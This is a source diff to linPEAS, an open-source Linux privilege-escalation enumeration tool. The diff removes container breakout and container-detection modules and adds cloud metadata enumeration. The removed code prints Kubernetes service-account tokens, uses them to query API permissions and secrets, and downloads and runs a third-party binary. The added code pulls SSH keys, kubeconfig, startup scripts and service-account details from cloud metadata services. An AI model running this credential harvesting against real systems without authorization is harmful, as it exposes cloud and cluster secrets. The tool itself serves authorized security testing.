-# Global Variables: $binfmt_misc_breakout, $containercapsB, $containerType, $core_pattern_breakout, $dev_mounted, $efi_efivars_writable, $efi_vars_writable, $GREP_IGNORE_MOUNTS, $inContainer, $kallsyms_readable, $kcore_readable, $kmem_readable, $kmem_writable, $kmsg_readable, $mem_readable, $mem_writable, $modprobe_present, $mountinfo_readable, $panic_on_oom_dos, $panic_sys_fs_dos, $proc_configgz_readable, $proc_mounted, $run_unshare, $release_agent_breakout1, $release_agent_breakout2, $release_agent_breakout3, $sched_debug_readable, $security_present, $security_writable, $sysreq_trigger_dos, $uevent_helper_breakout, $vmcoreinfo_readable, $VULN_CVE_2019_5021, $self_mem_readable
-# Initial Functions: containerCheck
-# Generated Global Variables: $defautl_docker_caps, $containerd_version, $runc_version, $containerd_version
-# Fat linpeas: 0
-# Small linpeas: 0
-
-if [ "$inContainer" ]; then
-    echo ""
-    print_2title "Container & breakout enumeration"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html"
-    
-    # Basic container info
-    print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')"
-    if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then
-        print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
-    fi
-    
-    # Security mechanisms
-    print_3title "Security Mechanisms"
-    print_list "Seccomp enabled? ............... "$NC
-    ([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
-
-    print_list "AppArmor profile? .............. "$NC
-    (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
-
-    print_list "User proc namespace? ........... "$NC
-    if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
-
-    # Known vulnerabilities
-    print_3title "Known Vulnerabilities"
-    
-    checkContainerExploits
-    print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    
-    # Check for container escape tools
-    print_list "Container escape tools present .. "$NC
-    (command -v nsenter || command -v unshare || command -v chroot || command -v capsh || command -v setcap || command -v getcap || command -v docker || command -v kubectl || command -v ctr || command -v runc || command -v containerd || command -v crio || command -v podman || command -v lxc || command -v rkt || command -v nerdctl || echo "No") | sed -${E} "s,nsenter|unshare|chroot|capsh|setcap|getcap|docker|kubectl|ctr|runc|containerd|crio|podman|lxc|rkt|nerdctl,${SED_RED},g"
-    
-    # Runtime vulnerabilities
-    print_3title "Runtime Vulnerabilities"
-    
-    # Check for known runtime vulnerabilities
-    if [ "$(command -v runc || echo -n '')" ]; then
-        print_list "Runc version ................. "$NC
-        warn_exec runc --version
-        # Check for specific runc vulnerabilities
-        runc_version=$(runc --version 2>/dev/null | grep -i "version" | grep -Eo "[0-9]+\.[0-9]+\.[0-9]+")
-        if [ "$runc_version" ]; then
-            print_list "Runc CVE-2019-5736 ........... "$NC
-            if [ "$(echo $runc_version | awk -F. '{ if ($1 < 1 || ($1 == 1 && $2 < 0) || ($1 == 1 && $2 == 0 && $3 < 7)) print "Yes"; else print "No"; }')" = "Yes" ]; then
-                echo "Yes - Vulnerable" | sed -${E} "s,Yes,${SED_RED},"
-            else
-                echo "No"
-            fi
-        fi
-    fi
-    
-    if [ "$(command -v containerd || echo -n '')" ]; then
-        print_list "Containerd version ........... "$NC
-        warn_exec containerd --version
-        # Check for specific containerd vulnerabilities
-        containerd_version=$(containerd --version 2>/dev/null | grep -Eo "[0-9]+\.[0-9]+\.[0-9]+")
-        if [ "$containerd_version" ]; then
-            print_list "Containerd CVE-2020-15257 ..... "$NC
-            if [ "$(echo $containerd_version | awk -F. '{ if ($1 < 1 || ($1 == 1 && $2 < 4) || ($1 == 1 && $2 == 4 && $3 < 3)) print "Yes"; else print "No"; }')" = "Yes" ]; then
-                echo "Yes - Vulnerable" | sed -${E} "s,Yes,${SED_RED},"
-            else
-                echo "No"
-            fi
-        fi
-    fi
-    
-    # Mount escape vectors
-    print_3title "Breakout via mounts"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.html"
-    
-    checkProcSysBreakouts
-    print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "Run unshare .................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "release_agent breakout 3........ $release_agent_breakout3\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    
-    # Additional mount checks
-    print_list "Docker socket mounted? ......... "$NC
-    (mount | grep -E "docker.sock|/var/run/docker.sock" || echo "No") | sed -${E} "s,Yes|docker.sock,${SED_RED},"
-    
-    print_list "Common host filesystem mounted?  "$NC
-    (mount | grep -E "host|/host|/mnt/host" || echo "No") | sed -${E} "s,Yes|host,${SED_RED},"
-    
-    print_list "Interesting mounts ............. "$NC
-    mount | grep -E "docker|container|overlay|kubelet" | grep -v "proc" | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
-    
-    # Check for writable mount points
-    print_list "Writable mount points ......... "$NC
-    mount | grep -E "rw," | grep -v "ro," | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
-    
-    # Check for shared mount points
-    print_list "Shared mount points ........... "$NC
-    mount | grep -E "shared|slave" | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
-    
-    # Capability checks
-    print_3title "Capability Checks"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/capabilities-abuse-escape.html"
-    
-    print_list "Dangerous capabilities ......... "$NC
-    if [ "$(command -v capsh || echo -n '')" ]; then 
-        capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
-    else
-        defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
-        cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
-        echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
-    fi
-    
-    # Additional capability checks
-    print_list "Dangerous syscalls allowed ... "$NC
-    if [ -f "/proc/sys/kernel/yama/ptrace_scope" ]; then
-        (cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo "Not found") | sed -${E} "s,0,${SED_RED},"
-    else
-        echo "Not found"
-    fi
-    
-    # Namespace checks
-    print_3title "Namespace Checks"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/namespaces/index.html"
-    
-    print_list "Current namespaces ............. "$NC
-    ls -l /proc/self/ns/
-    
-    print_list "Host network namespace? ........ "$NC
-    if [ "$(ip netns list 2>/dev/null)" ]; then
-        echo "Yes - Host network namespace accessible" | sed -${E} "s,Yes,${SED_RED},"
-    else
-        echo "No"
-    fi
-    
-    # Additional namespace checks
-    print_list "Host IPC namespace? ........... "$NC
-    if [ "$(ls -l /proc/self/ns/ipc 2>/dev/null)" = "$(ls -l /proc/1/ns/ipc 2>/dev/null)" ]; then
-        echo "Yes - Host IPC namespace shared" | sed -${E} "s,Yes,${SED_RED},"
-    else
-        echo "No"
-    fi
-    
-    print_list "Host PID namespace? ........... "$NC
-    if [ "$(ls -l /proc/self/ns/pid 2>/dev/null)" = "$(ls -l /proc/1/ns/pid 2>/dev/null)" ]; then
-        echo "Yes - Host PID namespace shared" | sed -${E} "s,Yes,${SED_RED},"
-    else
-        echo "No"
-    fi
-    
-    print_list "Host UTS namespace? ........... "$NC
-    if [ "$(ls -l /proc/self/ns/uts 2>/dev/null)" = "$(ls -l /proc/1/ns/uts 2>/dev/null)" ]; then
-        echo "Yes - Host UTS namespace shared" | sed -${E} "s,Yes,${SED_RED},"
-    else
-        echo "No"
-    fi
-    
-    # Additional breakout vectors
-    print_3title "Additional Breakout Vectors"
-    
-    print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
-    print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
-    
-    # Check for container escape tools in PATH
-    print_list "Container escape tools in PATH . "$NC
-    (which nsenter 2>/dev/null || which unshare 2>/dev/null || which chroot 2>/dev/null || which capsh 2>/dev/null || which setcap 2>/dev/null || which getcap 2>/dev/null || echo "No") | sed -${E} "s,nsenter|unshare|chroot|capsh|setcap|getcap,${SED_RED},g"
-
-    print_3title "Extra Breakout Vectors"
-    print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/self/mem readable ........ $self_mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
-    
-    # Additional kernel checks
-    print_list "Kernel version .............. "$NC
-    uname -a | sed -${E} "s,$(uname -r),${SED_RED},"
-    
-    print_list "Kernel modules ............. "$NC
-    lsmod | grep -E "overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio" | sed -${E} "s,overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio,${SED_RED},g"
-    
-    # Additional container runtime checks
-    print_list "Container runtime sockets .. "$NC
-    (find /var/run -name "*.sock" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt,${SED_RED},g"
-    
-    print_list "Container runtime configs .. "$NC
-    (find /etc -name "*.conf" -o -name "*.json" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt,${SED_RED},g"
-    
-    # Kubernetes specific checks
-    if echo "$containerType" | grep -qi "kubernetes"; then
-        print_3title "Kubernetes Specific Checks"
-        print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"
-        
-        print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
-        print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
-        
-        print_list "Kubernetes service account folder" | sed -${E} "s,.*,${SED_RED},"
-        ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
-        
-        print_list "Kubernetes env vars" | sed -${E} "s,.*,${SED_RED},"
-        (env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
-        
-        print_list "Current sa user k8s permissions" | sed -${E} "s,.*,${SED_RED},"
-        kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \
-          "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
-            -X 'POST' -H 'Content-Type: application/json' \
-            --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"
-        
-        # Additional Kubernetes checks
-        print_list "Kubernetes API server ...... "$NC
-        (curl -s -k https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/version 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
-        
-        print_list "Kubernetes secrets ......... "$NC
-        (kubectl get secrets 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
-        
-        print_list "Kubernetes pods ............ "$NC
-        (kubectl get pods 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
-        
-        print_list "Kubernetes services ........ "$NC
-        (kubectl get services 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
-        
-        print_list "Kubernetes nodes ........... "$NC
-        (kubectl get nodes 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
-    fi
-    
-    # Interesting files and mounts
-    print_3title "Interesting Files & Mounts"
-    print_list "Interesting files mounted ........ "$NC
-    (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g"
-    
-    print_list "Possible entrypoints ........... "$NC
-    ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
-    
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/2_container/6_Am_I_contained.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/6_Am_I_contained.sh
@ -1,20 +0,0 @@
-# Title: Container - Am I Containered 
-# ID: CT_Am_I_contained
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Am I Containered tool
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, execBin
-# Global Variables:
-# Initial Functions:
-# Generated Global Variables: $FAT_LINPEAS_AMICONTAINED
-# Fat linpeas: 1
-# Small linpeas: 0
-
-
-if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then
-  print_2title "Am I Containered?"
-  FAT_LINPEAS_AMICONTAINED="peass{https://github.com/genuinetools/amicontained/releases/latest/download/amicontained-linux-amd64}"
-  execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud.sh
@ -0,0 +1,504 @@
+###########################################
+#-----------) Cloud functions (-----------#
+###########################################
+
+GCP_GOOD_SCOPES="/devstorage.read_only|/logging.write|/monitoring|/servicecontrol|/service.management.readonly|/trace.append"
+GCP_BAD_SCOPES="/cloud-platform|/compute"
+
+exec_with_jq(){
+  if [ "$(command -v jq)" ]; then 
+    $@ | jq 2>/dev/null;
+    if ! [ $? -eq 0 ]; then
+      $@;
+    fi
+   else 
+    $@;
+   fi
+}
+
+check_gcp(){
+  is_gcp="No"
+  if grep -q metadata.google.internal /etc/hosts 2>/dev/null || (curl --connect-timeout 2 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]); then
+    is_gcp="Yes"
+  fi
+}
+
+check_do(){
+  is_do="No"
+  if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then
+    is_do="Yes"
+  fi
+}
+
+check_ibm_vm(){
+  is_ibm_vm="No"
+  if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then
+    curl --connect-timeout 2  "http://169.254.169.254" > /dev/null 2>&1 || wget --timeout 2 --tries 1  "http://169.254.169.254" > /dev/null 2>&1
+    if [ "$?" -eq 0 ]; then
+      IBM_TOKEN=$( ( curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H "Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"' -f4 ) || ( wget --tries 1 -O - --method PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header "Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d '"' -f4 ) )
+      is_ibm_vm="Yes"
+    fi
+  fi
+}
+
+check_aws_ecs(){
+  is_aws_ecs="No"
+  if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then
+    is_aws_ecs="Yes";
+    aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI_v4;
+    aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+  
+  elif (env | grep -q ECS_CONTAINER_METADATA_URI); then
+    is_aws_ecs="Yes";
+    aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI;
+    aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+  
+  elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then
+    is_aws_ecs="Yes";
+  fi
+  
+  if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then
+    aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+  fi
+}
+
+check_aws_ec2(){
+  is_aws_ec2="No"
+  is_aws_ec2_beanstalk="No"
+
+  if [ -d "/var/log/amazon/" ]; then
+    is_aws_ec2="Yes"
+    EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
+
+  else
+    EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
+    if [ "$(echo $EC2_TOKEN | cut -c1-2)" = "AQ" ]; then
+      is_aws_ec2="Yes"
+    fi
+  fi
+  
+  if [ "$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then
+    is_aws_ec2_beanstalk="Yes"
+  fi
+}
+
+check_aws_lambda(){
+  is_aws_lambda="No"
+
+  if (env | grep -q AWS_LAMBDA_); then
+    is_aws_lambda="Yes"
+  fi
+}
+
+check_aws_codebuild(){
+  is_aws_codebuild="No"
+
+  if [ -f "/codebuild/output/tmp/env.sh" ] && grep -q "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" "/codebuild/output/tmp/env.sh" ; then
+    is_aws_codebuild="Yes"
+  fi
+}
+
+check_az_vm(){
+  is_az_vm="No"
+
+  if [ -d "/var/log/azure/" ]; then
+    is_az_vm="Yes"
+  
+  elif cat /etc/resolv.conf 2>/dev/null | grep -q "search reddog.microsoft.com"; then
+    is_az_vm="Yes"
+  fi
+}
+
+check_az_app(){
+  is_az_app="No"
+
+  if [ -d "/opt/microsoft" ] && env | grep -q "IDENTITY_ENDPOINT"; then
+    is_az_app="Yes"
+  fi
+}
+
+
+check_gcp
+print_list "Google Cloud Platform? ............... $is_gcp\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_aws_ecs
+print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_aws_ec2
+print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_aws_lambda
+print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_aws_codebuild
+print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_do
+print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_ibm_vm
+print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_az_vm
+print_list "Azure VM? ............................ $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_az_app
+print_list "Azure APP? ........................... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+
+echo ""
+
+if [ "$is_gcp" = "Yes" ]; then
+    gcp_req=""
+    if [ "$(command -v curl)" ]; then
+        gcp_req='curl -s -f  -H "X-Google-Metadata-Request: True"'
+    elif [ "$(command -v wget)" ]; then
+        gcp_req='wget -q -O - --header "X-Google-Metadata-Request: True"'
+    else 
+        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+    fi
+
+
+    if [ "$gcp_req" ]; then
+        print_2title "Google CLoud Platform Enumeration"
+        print_info "https://book.hacktricks.xyz/cloud-security/gcp-security"
+
+        ## GC Project Info
+        p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
+        [ "$p_id" ] && echo "Project-ID: $p_id"
+        p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
+        [ "$p_num" ] && echo "Project Number: $p_num"
+        pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
+        [ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k"
+        p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
+        [ "$p_attrs" ] && echo "All Project Attributes: $p_attrs"
+
+        # OSLogin Info
+        osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users)
+        [ "$osl_u" ] && echo "OSLogin users: $osl_u"
+        osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups)
+        [ "$osl_g" ] && echo "OSLogin Groups: $osl_g"
+        osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys)
+        [ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk"
+        osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize)
+        [ "$osl_au" ] && echo "OSLogin Authorize: $osl_au"
+
+        # Instance Info
+        inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description)
+        [ "$inst_d" ] && echo "Instance Description: "
+        inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname)
+        [ "$inst_hostn" ] && echo "Hostname: $inst_hostn"
+        inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
+        [ "$inst_id" ] && echo "Instance ID: $inst_id"
+        inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image)
+        [ "$inst_img" ] && echo "Instance Image: $inst_img"
+        inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type)
+        [ "$inst_mt" ] && echo "Machine Type: $inst_mt"
+        inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name)
+        [ "$inst_n" ] && echo "Instance Name: $inst_n"
+        inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags)
+        [ "$inst_tag" ] && echo "Instance tags: $inst_tag"
+        inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
+        [ "$inst_zone" ] && echo "Zone: $inst_zone"
+
+        inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
+        [ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
+        inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
+        [ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
+        inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
+        [ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
+        inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
+        [ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
+        inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
+        [ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
+        inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
+        [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv"
+
+        echo ""
+        print_3title "Interfaces"
+        for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do 
+            echo "  IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
+            echo "  Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
+            echo "  Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
+            echo "  DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
+            echo "  Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
+            echo "  ==============  "
+        done
+        
+        echo ""
+        print_3title "User Data"
+        echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
+        echo ""
+
+        echo ""
+        print_3title "Service Accounts"
+        for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
+            echo "  Name: $sa"
+            echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
+            echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
